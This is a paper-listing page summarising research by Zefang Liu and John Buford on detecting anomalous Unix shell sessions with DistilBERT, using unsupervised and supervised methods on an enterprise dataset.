Anomaly Detection of Command Shell Sessions based on DistilBERT: Unsupervised and Supervised Approaches
Zefang Liu, John Buford

TL;DR
This paper explores using DistilBERT, a transformer-based model, for detecting anomalies in Unix shell sessions through both unsupervised and supervised methods, improving security analysis with minimal data labeling.
Contribution
It introduces a novel application of DistilBERT for Unix shell anomaly detection using combined unsupervised and supervised techniques, reducing the need for extensive labeled data.
Findings
Effective detection of anomalous shell sessions demonstrated on large enterprise datasets.
Unsupervised approach captures session deviations without labeled data.
Supervised method further improves detection accuracy.
Abstract
Anomaly detection in command shell sessions is a critical aspect of computer security. Recent advances in deep learning and natural language processing, particularly transformer-based models, have shown great promise for addressing complex security challenges. In this paper, we implement a comprehensive approach to detect anomalies in Unix shell sessions using a pretrained DistilBERT model, leveraging both unsupervised and supervised learning techniques to identify anomalous activity while minimizing data labeling. The unsupervised method captures the underlying structure and syntax of Unix shell commands, enabling the detection of session deviations from normal behavior. Experiments on a large-scale enterprise dataset collected from production systems demonstrate the effectiveness of our approach in detecting anomalous behavior in Unix shell sessions. This work highlights the potential…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
Taxonomy
TopicsNetwork Security and Intrusion Detection · Advanced Malware Detection Techniques · Software System Performance and Reliability
MethodsMulti-Head Attention · Attention Is All You Need · Linear Layer · Attention Dropout · Softmax · Dense Connections · Adam · Residual Connection · WordPiece · Dropout
